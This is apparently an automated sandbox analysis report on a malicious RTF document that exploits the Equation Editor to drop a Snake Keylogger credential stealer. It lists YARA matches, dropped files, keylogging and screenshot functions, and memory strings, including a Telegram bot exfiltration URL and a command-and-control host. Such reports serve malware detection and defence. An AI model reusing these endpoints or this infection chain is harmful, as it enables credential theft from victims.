                  Source: EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911778548.000000000365A000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003638000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000036EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003692000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003746000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.000000000370E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

                  System Summary

                  Source: initial sample Static file information: Filename: na.doc
                  Source: na.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Code function: 5_2_002EA980 NtQueryInformationProcess,5_2_002EA980
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Code function: 5_2_002EAEE8 NtQueryInformationProcess,5_2_002EAEE8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B0DF87_2_006B0DF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B7BF87_2_006B7BF8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B8BFF7_2_006B8BFF
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B90C97_2_006B90C9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B32C87_2_006B32C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD3C87_2_006BD3C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BBBCF7_2_006BBBCF
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B72CC7_2_006B72CC
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA8C07_2_006BA8C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B04D87_2_006B04D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B72D87_2_006B72D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B90D87_2_006B90D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B44D87_2_006B44D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B5BD17_2_006B5BD1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B1BD07_2_006B1BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BE6D77_2_006BE6D7
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BEBAB7_2_006BEBAB
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B69A87_2_006B69A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BC0A87_2_006BC0A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B52A17_2_006B52A1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B12A07_2_006B12A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B80A07_2_006B80A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B95A07_2_006B95A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD3B87_2_006BD3B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B52B07_2_006B52B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BEBB07_2_006BEBB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BA8B07_2_006BA8B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BAD887_2_006BAD88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B49807_2_006B4980
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD8807_2_006BD880
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B29987_2_006B2998
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B69987_2_006B6998
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006BD8907_2_006BD890
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B12907_2_006B1290
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B80907_2_006B8090
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B95947_2_006B9594
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D1CF07_2_006D1CF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DA5E87_2_006DA5E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB2687_2_006DB268
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D3E687_2_006D3E68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE4687_2_006DE468
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC8487_2_006DC848
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DFA487_2_006DFA48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D00407_2_006D0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAC287_2_006DAC28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D18287_2_006D1828
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DDE287_2_006DDE28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC2087_2_006DC208
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF4087_2_006DF408
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAC187_2_006DAC18
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D30107_2_006D3010
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D00127_2_006D0012
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DBEE87_2_006DBEE8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF0E87_2_006DF0E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D04F87_2_006D04F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD4C87_2_006DD4C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D34D87_2_006D34D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DEAA87_2_006DEAA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB8A87_2_006DB8A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DCE887_2_006DCE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D0E8B7_2_006D0E8B
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D26807_2_006D2680
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D0E987_2_006D0E98
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DCB687_2_006DCB68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D13607_2_006D1360
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D134F7_2_006D134F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DAF487_2_006DAF48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D2B487_2_006D2B48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE1487_2_006DE148
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DC5287_2_006DC528
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF7287_2_006DF728
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DDB087_2_006DDB08
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DA9087_2_006DA908
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D05087_2_006D0508
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DF7177_2_006DF717
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD7E87_2_006DD7E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DBBC87_2_006DBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DEDC87_2_006DEDC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D09C07_2_006D09C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D09D07_2_006D09D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD1A87_2_006DD1A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D39A07_2_006D39A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DD1A07_2_006DD1A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006D21B87_2_006D21B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DE7887_2_006DE788
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006DB5887_2_006DB588
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F00407_2_006F0040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F53307_2_006F5330
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F3D697_2_006F3D69
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAA687_2_006FAA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC4687_2_006FC468
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB7607_2_006FB760
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F3D787_2_006F3D78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FC4787_2_006FC478
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FE9787_2_006FE978
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F57787_2_006F5778
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FDE787_2_006FDE78
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FB7707_2_006FB770
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F30707_2_006F3070
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F4A707_2_006F4A70
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F7A487_2_006F7A48
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F94487_2_006F9448
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FF7407_2_006FF740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F6D407_2_006F6D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F87407_2_006F8740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F305F7_2_006F305F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FAA597_2_006FAA59
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F94587_2_006F9458
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F87507_2_006F8750
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006FCD287_2_006FCD28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F46287_2_006F4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F60287_2_006F6028
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006F53267_2_006F5326
